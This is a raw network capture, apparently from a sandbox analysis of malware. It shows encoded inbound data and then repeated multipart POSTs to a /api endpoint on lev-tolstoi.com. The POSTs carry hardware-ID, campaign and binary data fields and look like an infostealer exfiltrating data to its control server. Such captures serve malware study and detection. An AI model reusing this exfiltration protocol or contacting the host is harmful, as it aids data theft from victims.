491cX2UYYBZS9F21XPQR2uMBzfSuZRe3eA9Y7+V2xKO2+ZskR25CLGbYf8Y51iuukXSo2IwEc5VCaTmDlhPogcCUuWUDeQxlN9h/0CTWK4GYI6iajF810hJtOYOHF6/MxpX4Nwl/CHMxkDzZMZF0v4Jro53DDXqVVC09lcdM5u7TjfoSBGsLNC/YJpc5mjPgwWColsIDc9wQZzCLhhKu09+f8zcHfAl5OIQx0zaacrWCI+HWyx81jV
2024-12-27 13:42:17 UTC	1369	IN	Data Raw: 6f 2b 43 49 36 57 42 62 50 4d 78 4a 32 35 49 6b 6c 6a 51 6e 4d 38 31 6d 65 58 4e 70 70 39 76 59 4a 73 71 4a 66 4d 46 58 72 56 47 57 55 79 69 59 30 62 71 63 37 61 6b 66 34 31 44 6e 30 4e 63 7a 69 51 4d 4e 52 2b 32 44 4f 2f 6d 53 50 33 31 75 77 58 64 74 59 4f 59 43 76 4e 6d 46 71 2f 67 64 4f 58 75 57 56 48 66 41 78 31 50 5a 59 74 33 7a 57 64 64 71 71 4b 61 71 4b 62 7a 41 70 2f 32 68 6c 74 50 59 65 4e 47 36 7a 46 32 5a 62 2f 50 51 63 36 54 44 51 33 6a 6e 2b 50 66 72 56 32 71 49 5a 76 75 64 54 32 52 32 71 62 41 79 30 39 67 63 64 4d 35 73 6e 52 6d 50 6f 32 43 48 6b 4b 66 79 4b 57 4c 64 45 7a 6b 32 47 2b 68 47 32 6c 6c 64 34 4e 65 39 4d 5a 5a 44 47 45 67 68 4f 69 67 5a 72 62 2f 69 56 48 49 6b 4a 56 50 5a 30 7a 33 53 6d 57 4d 36 66 50 65 75 2b 52 77 45 63 74 6c Data Ascii: o+CI6WBbPMxJ25IkljQnM81meXNpp9vYJsqJfMFXrVGWUyiY0bqc7akf41Dn0NcziQMNR+2DO/mSP31uwXdtYOYCvNmFq/gdOXuWVHfAx1PZYt3zWddqqKaqKbzAp/2hltPYeNG6zF2Zb/PQc6TDQ3jn+PfrV2qIZvudT2R2qbAy09gcdM5snRmPo2CHkKfyKWLdEzk2G+hG2lld4Ne9MZZDGEghOigZrb/iVHIkJVPZ0z3SmWM6fPeu+RwEctl
2024-12-27 13:42:17 UTC	1369	IN	Data Raw: 4e 79 56 53 68 32 5a 54 44 75 52 63 45 62 67 46 2b 63 71 4d 38 32 54 43 52 5a 66 69 65 4c 62 62 57 79 77 73 31 6a 56 70 67 4f 34 57 42 42 71 6e 4d 31 35 58 33 4d 67 4a 31 43 6e 51 77 6d 7a 72 54 4e 5a 31 77 74 59 56 78 70 5a 62 45 41 6e 54 66 45 43 31 30 7a 59 41 4d 35 70 6d 55 71 75 34 32 52 55 38 42 65 6a 36 52 4b 5a 63 68 32 47 72 34 68 6d 2f 76 7a 6f 77 4b 66 64 41 66 59 6a 75 48 69 52 47 73 7a 64 79 56 2b 69 38 49 66 67 4a 34 4f 4a 77 79 32 54 71 65 65 72 4f 4b 5a 61 2b 58 78 6b 63 37 6c 52 31 31 65 74 58 48 49 4b 48 4e 32 5a 53 37 43 41 52 30 44 48 4d 6d 31 69 43 5a 4a 39 5a 30 74 4d 45 37 37 35 72 46 42 33 37 66 48 6d 30 39 67 49 49 58 6f 63 4c 5a 6e 50 4d 7a 41 48 34 4f 66 54 32 51 50 39 41 36 6b 32 47 39 69 47 2b 6a 31 6f 4a 48 63 73 31 61 4e 58 Data Ascii: NyVSh2ZTDuRcEbgF+cqM82TCRZfieLbbWyws1jVpgO4WBBqnM15X3MgJ1CnQwmzrTNZ1wtYVxpZbEAnTfEC10zYAM5pmUqu42RU8Bej6RKZch2Gr4hm/vzowKfdAfYjuHiRGszdyV+i8IfgJ4OJwy2TqeerOKZa+Xxkc7lR11etXHIKHN2ZS7CAR0DHMm1iCZJ9Z0tME775rFB37fHm09gIIXocLZnPMzAH4OfT2QP9A6k2G9iG+j1oJHcs1aNX
2024-12-27 13:42:17 UTC	1369	IN	Data Raw: 35 70 6d 55 6b 76 41 76 43 58 51 4c 65 54 61 65 4f 4e 6b 7a 6e 58 57 7a 68 6d 53 70 6d 38 51 4b 63 4e 59 62 61 54 43 66 68 42 2b 73 7a 4e 37 62 74 33 30 41 59 6b 49 73 63 4c 45 7a 2f 69 36 4e 59 61 37 42 66 4f 47 50 6a 41 42 35 6c 55 49 74 4f 59 4b 4f 47 36 37 4a 32 35 54 39 4d 77 46 38 44 33 45 2f 6e 43 33 66 4d 4a 74 34 74 34 70 78 72 35 76 49 43 33 48 64 45 57 64 36 77 38 63 54 76 6f 47 4d 32 38 77 77 43 48 6f 42 59 6e 43 4a 63 63 35 2b 6b 58 2f 34 32 53 4f 6a 6d 4d 77 49 65 64 6b 52 5a 54 75 42 69 52 4f 6a 79 4e 79 54 36 7a 77 44 63 67 4e 36 50 35 63 37 30 6a 75 53 64 4c 79 48 62 4f 2f 59 6a 41 42 74 6c 55 49 74 46 61 71 79 56 6f 66 37 6c 49 53 33 4a 45 64 39 44 6a 52 6f 31 6a 50 55 4d 70 35 38 76 6f 68 76 70 5a 2f 48 43 33 37 52 46 6d 51 2f 69 34 59 Data Ascii: 5pmUkvAvCXQLeTaeONkznXWzhmSpm8QKcNYbaTCfhB+szN7bt30AYkIscLEz/i6NYa7BfOGPjAB5lUItOYKOG67J25T9MwF8D3E/nC3fMJt4t4pxr5vIC3HdEWd6w8cTvoGM28wwCHoBYnCJcc5+kX/42SOjmMwIedkRZTuBiROjyNyT6zwDcgN6P5c70juSdLyHbO/YjABtlUItFaqyVof7lIS3JEd9DjRo1jPUMp58vohvpZ/HC37RFmQ/i4Y
2024-12-27 13:42:17 UTC	1369	IN	Data Raw: 70 7a 77 4c 77 6c 33 44 58 77 34 6e 7a 37 54 4f 35 74 31 74 49 74 69 71 4a 6a 43 44 7a 57 62 57 6d 6f 69 7a 64 39 55 68 39 48 50 69 65 38 77 4a 6e 63 4e 4e 43 2f 59 4a 70 63 35 6d 6a 50 67 77 57 71 39 6b 73 45 56 66 4e 49 55 59 6a 6d 66 68 68 6d 74 30 39 4f 55 2f 54 6f 4c 66 41 31 79 4d 5a 4d 31 32 7a 6d 54 65 4c 65 4e 49 2b 48 57 79 78 38 31 6a 56 70 44 4d 5a 36 51 46 36 6a 4b 77 6f 43 35 49 6b 6c 6a 51 6e 4d 38 31 6d 65 58 50 5a 31 34 76 49 46 76 72 35 4c 42 42 32 66 61 48 57 6f 7a 68 70 55 65 6f 63 62 66 6b 2f 49 79 41 57 67 4f 65 69 4b 54 4c 63 56 2b 32 44 4f 2f 6d 53 50 33 31 76 6f 41 5a 63 55 5a 4c 77 75 62 68 41 4b 74 7a 4e 6a 62 35 6e 4d 65 4f 67 56 34 63 4d 35 2f 30 54 47 66 63 4c 65 41 61 71 4f 62 79 51 35 77 31 42 78 70 4d 49 65 48 45 71 44 41 Data Ascii: pzwLwl3DXw4nz7TO5t1tItiqJjCDzWbWmoizd9Uh9HPie8wJncNNC/YJpc5mjPgwWq9ksEVfNIUYjmfhhmt09OU/ToLfA1yMZM12zmTeLeNI+HWyx81jVpDMZ6QF6jKwoC5IkljQnM81meXPZ14vIFvr5LBB2faHWozhpUeocbfk/IyAWgOeiKTLcV+2DO/mSP31voAZcUZLwubhAKtzNjb5nMeOgV4cM5/0TGfcLeAaqObyQ5w1BxpMIeHEqDA
2024-12-27 13:42:17 UTC	1369	IN	Data Raw: 30 41 64 6b 49 73 63 4a 55 34 31 44 2b 63 65 72 53 4f 5a 4b 75 45 78 67 42 6e 31 42 74 6d 4e 34 47 48 47 61 76 4c 31 5a 4c 30 4d 51 70 39 42 58 73 31 31 6e 47 58 4f 59 34 7a 34 4d 46 43 6f 70 33 41 58 43 2b 56 42 53 4d 6a 7a 59 41 59 35 70 6d 55 6d 2f 4d 34 44 58 63 42 65 7a 4f 45 50 74 45 73 6c 6e 36 79 6b 32 6d 6b 6b 38 45 4b 65 4e 59 63 61 7a 47 42 6c 52 32 6d 77 74 2f 62 74 33 30 41 59 6b 49 73 63 4c 55 6f 77 54 53 52 66 36 36 4b 59 71 79 41 77 52 63 31 6d 31 70 38 50 5a 7a 48 54 4c 44 52 77 35 7a 6d 63 78 34 36 42 58 68 77 7a 6e 2f 52 4e 35 42 30 76 6f 39 78 71 70 44 44 43 48 7a 63 48 6d 55 35 6a 59 4d 51 6f 63 54 58 6c 2f 49 36 42 48 55 47 66 54 36 66 4d 4a 64 77 31 6e 53 67 77 54 76 76 74 39 63 45 65 64 68 61 63 6e 53 55 78 78 4f 71 67 59 7a 62 39 Data Ascii: 0AdkIscJU41D+cerSOZKuExgBn1BtmN4GHGavL1ZL0MQp9BXs11nGXOY4z4MFCop3AXC+VBSMjzYAY5pmUm/M4DXcBezOEPtEsln6yk2mkk8EKeNYcazGBlR2mwt/bt30AYkIscLUowTSRf66KYqyAwRc1m1p8PZzHTLDRw5zmcx46BXhwzn/RN5B0vo9xqpDDCHzcHmU5jYMQocTXl/I6BHUGfT6fMJdw1nSgwTvvt9cEedhacnSUxxOqgYzb9
2024-12-27 13:42:17 UTC	1369	IN	Data Raw: 4a 59 6a 57 52 4b 5a 55 4c 6c 58 32 32 68 6e 58 76 69 66 4e 4a 4e 64 6f 41 4c 57 4b 30 6e 6c 53 68 7a 5a 54 44 75 53 67 41 65 67 56 75 4a 70 45 7a 78 6a 57 62 66 35 71 4f 5a 4c 6d 56 77 77 52 6b 33 46 5a 6d 4e 38 33 4a 56 4b 48 5a 6c 4d 4f 35 45 67 42 73 41 56 73 7a 68 7a 61 58 63 4e 5a 30 72 73 45 37 37 36 69 4d 46 58 62 46 47 57 49 72 73 38 64 4d 76 2f 2b 55 6b 4f 38 36 46 33 6b 55 66 7a 32 61 4c 75 6c 2b 7a 69 66 71 30 7a 48 39 78 4e 4e 48 61 75 70 55 4c 54 76 4e 33 79 32 2f 67 63 4c 62 6f 57 39 4a 4f 68 41 30 61 4e 5a 34 31 43 79 45 64 62 75 58 59 4f 69 6f 38 69 42 6a 33 78 31 39 50 5a 71 49 56 4f 69 42 32 39 75 68 42 45 64 7a 42 57 38 68 67 44 4c 48 4f 64 5a 4d 39 73 46 37 37 38 36 4d 4d 6e 62 62 46 47 6f 73 6e 4d 6f 7a 73 4d 76 54 69 2f 34 71 43 44 Data Ascii: JYjWRKZULlX22hnXvifNJNdoALWK0nlShzZTDuSgAegVuJpEzxjWbf5qOZLmVwwRk3FZmN83JVKHZlMO5EgBsAVszhzaXcNZ0rsE776iMFXbFGWIrs8dMv/+UkO86F3kUfz2aLul+zifq0zH9xNNHaupULTvN3y2/gcLboW9JOhA0aNZ41CyEdbuXYOio8iBj3x19PZqIVOiB29uhBEdzBW8hgDLHOdZM9sF7786MMnbbFGosnMozsMvTi/4qCD
2024-12-27 13:42:17 UTC	1369	IN	Data Raw: 6e 54 2f 51 4c 6f 42 6f 39 49 6c 67 74 59 7a 79 4f 56 37 5a 48 47 6f 67 69 6f 45 79 68 6f 47 61 32 2f 5a 39 58 30 4e 43 50 48 43 70 63 5a 63 6d 31 69 76 34 74 47 43 68 6d 4d 73 52 5a 4a 67 79 54 67 43 33 78 54 69 68 31 4a 61 76 2f 69 30 57 63 51 39 34 63 4e 68 2f 30 58 37 4f 49 2f 62 42 5a 37 37 57 6c 46 63 6e 6a 6b 38 2b 62 64 33 56 43 2b 6a 59 6c 49 32 35 5a 56 55 30 51 6d 5a 77 7a 6e 2b 51 50 59 52 68 76 6f 4a 31 72 4e 48 79 4f 56 4c 62 48 57 77 73 6e 5a 41 62 6d 50 2f 42 6d 50 63 7a 41 47 77 54 4e 48 37 57 4d 4a 64 6d 72 7a 50 77 77 56 7a 68 31 74 52 48 4c 5a 55 76 62 6a 53 44 67 41 4b 33 6a 50 4f 56 2f 6a 77 52 61 68 56 37 63 4e 68 2f 30 58 37 4f 49 66 62 42 5a 37 37 57 6c 46 63 6e 6a 6b 38 2b 62 64 33 56 43 2b 6a 59 6c 49 32 35 5a 56 55 30 51 6d 5a Data Ascii: nT/QLoBo9IlgtYzyOV7ZHGogioEyhoGa2/Z9X0NCPHCpcZcm1iv4tGChmMsRZJgyTgC3xTih1Jav/i0WcQ94cNh/0X7OI/bBZ77WlFcnjk8+bd3VC+jYlI25ZVU0QmZwzn+QPYRhvoJ1rNHyOVLbHWwsnZAbmP/BmPczAGwTNH7WMJdmrzPwwVzh1tRHLZUvbjSDgAK3jPOV/jwRahV7cNh/0X7OIfbBZ77WlFcnjk8+bd3VC+jYlI25ZVU0QmZ
2024-12-27 13:42:17 UTC	1369	IN	Data Raw: 43 69 56 4d 2f 62 42 62 2b 2f 4f 6a 41 5a 2f 78 52 64 69 50 63 47 41 44 71 47 42 6d 74 76 33 66 56 38 36 41 33 34 67 6d 7a 44 51 63 70 42 39 74 73 46 38 34 59 2b 4d 45 54 57 4e 53 53 4e 36 6e 38 64 4d 35 6f 62 58 69 65 73 37 42 47 77 42 4d 77 36 6f 45 73 55 35 68 6e 44 36 73 47 36 72 67 4e 6b 45 5a 64 49 6b 55 78 65 66 67 41 53 6c 67 2b 57 4e 2b 6a 30 4a 66 55 49 36 63 49 35 2f 6a 33 36 37 59 62 2b 52 59 4f 2f 59 6a 41 73 31 6a 56 70 67 4b 49 71 58 46 2b 72 47 7a 70 79 35 49 6b 6c 6a 51 6d 4a 77 7a 6d 79 5a 66 6f 51 7a 34 4d 45 6b 6f 5a 76 4e 42 48 76 57 43 48 38 38 6a 70 45 58 34 66 2f 71 74 75 73 36 46 33 6c 41 52 54 32 53 4b 63 49 39 68 6e 53 47 76 30 36 39 6b 64 77 45 4e 2f 6b 64 59 44 61 7a 75 53 4f 33 78 73 54 5a 33 7a 34 52 65 55 49 36 63 49 35 2f Data Ascii: CiVM/bBb+/OjAZ/xRdiPcGADqGBmtv3fV86A34gmzDQcpB9tsF84Y+METWNSSN6n8dM5obXies7BGwBMw6oEsU5hnD6sG6rgNkEZdIkUxefgASlg+WN+j0JfUI6cI5/j367Yb+RYO/YjAs1jVpgKIqXF+rGzpy5IkljQmJwzmyZfoQz4MEkoZvNBHvWCH88jpEX4f/qtus6F3lART2SKcI9hnSGv069kdwEN/kdYDazuSO3xsTZ3z4ReUI6cI5/

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:42:18 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0HFAPZNC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18105 Host: lev-tolstoi.com
2024-12-27 13:42:18 UTC	15331	OUT	Data Raw: 2d 2d 30 48 46 41 50 5a 4e 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 31 34 30 31 39 45 36 35 41 46 42 33 32 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 30 48 46 41 50 5a 4e 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 48 46 41 50 5a 4e 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 76 6f 69 64 65 65 64 0d 0a 2d 2d 30 48 46 41 50 5a 4e 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 Data Ascii: --0HFAPZNCContent-Disposition: form-data; name="hwid"514019E65AFB322223D904AF30EFEBBC--0HFAPZNCContent-Disposition: form-data; name="pid"2--0HFAPZNCContent-Disposition: form-data; name="lid"H8NgCl--voideed--0HFAPZNCContent-Dispos
2024-12-27 13:42:18 UTC	2774	OUT	Data Raw: ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b 91 d7 Data Ascii: f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{
2024-12-27 13:42:19 UTC	1138	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:42:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kduecj822kceb0iii9ihgcnoqr; expires=Tue, 22 Apr 2025 07:28:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eQHn8ZzquIiboQ643Qtf1KBnTjuf%2Bu4H84Dl7T87YxMcXuXnMk2dWRqcDdEjYlyX6F6%2BASEs%2B8B%2FdEBDq%2BT11HIy1sh%2BoD%2BtrNlLullcjo6EI%2BbEgntIuxxpE5vnsZbRA2c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89bbb05a0d8cca-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1989&min_rtt=1981&rtt_var=760&sent=12&recv=21&lost=0&retrans=0&sent_bytes=2834&recv_bytes=19056&delivery_rate=1425085&cwnd=239&unsent_bytes=0&cid=60aeacfefca14fcc&ts=1144&x=0"
2024-12-27 13:42:19 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 13:42:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:42:21 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=H3GYVVKZ42S3PCHO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8774 Host: lev-tolstoi.com
2024-12-27 13:42:21 UTC	8774	OUT	Data Raw: 2d 2d 48 33 47 59 56 56 4b 5a 34 32 53 33 50 43 48 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 31 34 30 31 39 45 36 35 41 46 42 33 32 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 48 33 47 59 56 56 4b 5a 34 32 53 33 50 43 48 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 33 47 59 56 56 4b 5a 34 32 53 33 50 43 48 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 76 6f 69 64 65 65 64 0d 0a 2d 2d Data Ascii: --H3GYVVKZ42S3PCHOContent-Disposition: form-data; name="hwid"514019E65AFB322223D904AF30EFEBBC--H3GYVVKZ42S3PCHOContent-Disposition: form-data; name="pid"2--H3GYVVKZ42S3PCHOContent-Disposition: form-data; name="lid"H8NgCl--voideed--
2024-12-27 13:42:22 UTC	1129	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:42:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jc6al45o39vj6unsdqrn5mjetv; expires=Tue, 22 Apr 2025 07:29:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QDtx1DqnrvEO%2BTVzQK6tD%2BQWdTRMAt5e6f7HRQ3Gm0J4B9fxveRJ2uCOlPbPbg2qEmyzNh%2Fwg%2B3%2BLCbewfI3nQyzjCiywvCQ3MZnR4i7SABX95I0dzr8w4HupcsL5C9U070%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89bbbfde5b19b2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2029&min_rtt=2023&rtt_var=770&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2834&recv_bytes=9710&delivery_rate=1409946&cwnd=149&unsent_bytes=0&cid=3e61d6b0d28236b1&ts=903&x=0"
2024-12-27 13:42:22 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 13:42:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:42:23 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JZM11EAQ7UW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20397 Host: lev-tolstoi.com
2024-12-27 13:42:23 UTC	15331	OUT	Data Raw: 2d 2d 4a 5a 4d 31 31 45 41 51 37 55 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 31 34 30 31 39 45 36 35 41 46 42 33 32 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4a 5a 4d 31 31 45 41 51 37 55 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4a 5a 4d 31 31 45 41 51 37 55 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 76 6f 69 64 65 65 64 0d 0a 2d 2d 4a 5a 4d 31 31 45 41 51 37 55 57 0d 0a 43 6f Data Ascii: --JZM11EAQ7UWContent-Disposition: form-data; name="hwid"514019E65AFB322223D904AF30EFEBBC--JZM11EAQ7UWContent-Disposition: form-data; name="pid"3--JZM11EAQ7UWContent-Disposition: form-data; name="lid"H8NgCl--voideed--JZM11EAQ7UWCo
2024-12-27 13:42:23 UTC	5066	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 Data Ascii: lrQMn 64F6(X&7~`aO@
2024-12-27 13:42:24 UTC	1127	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:42:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=b608525p2pfnprorme5um98mcs; expires=Tue, 22 Apr 2025 07:29:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FlycBwnBtxCIjhWseyJf421AV1Uj3HeWtTo5sK5lPmuq7LpDIpV2Mik6eWO6guAsaV%2BGFqo58VRpHfjzTtivJ%2FNbe6Nww0iE3bQdeN4XgLfTAOmQOy2yEIFO01n6X6eu4Sg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89bbd05db141e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1659&rtt_var=627&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21351&delivery_rate=1739130&cwnd=202&unsent_bytes=0&cid=4b346a78dd58100a&ts=971&x=0"
2024-12-27 13:42:24 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 13:42:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:42:27 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3YRYN79WNXQICM6JN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1258 Host: lev-tolstoi.com
2024-12-27 13:42:27 UTC	1258	OUT	Data Raw: 2d 2d 33 59 52 59 4e 37 39 57 4e 58 51 49 43 4d 36 4a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 31 34 30 31 39 45 36 35 41 46 42 33 32 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 33 59 52 59 4e 37 39 57 4e 58 51 49 43 4d 36 4a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 59 52 59 4e 37 39 57 4e 58 51 49 43 4d 36 4a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 76 6f 69 64 65 65 64 0d Data Ascii: --3YRYN79WNXQICM6JNContent-Disposition: form-data; name="hwid"514019E65AFB322223D904AF30EFEBBC--3YRYN79WNXQICM6JNContent-Disposition: form-data; 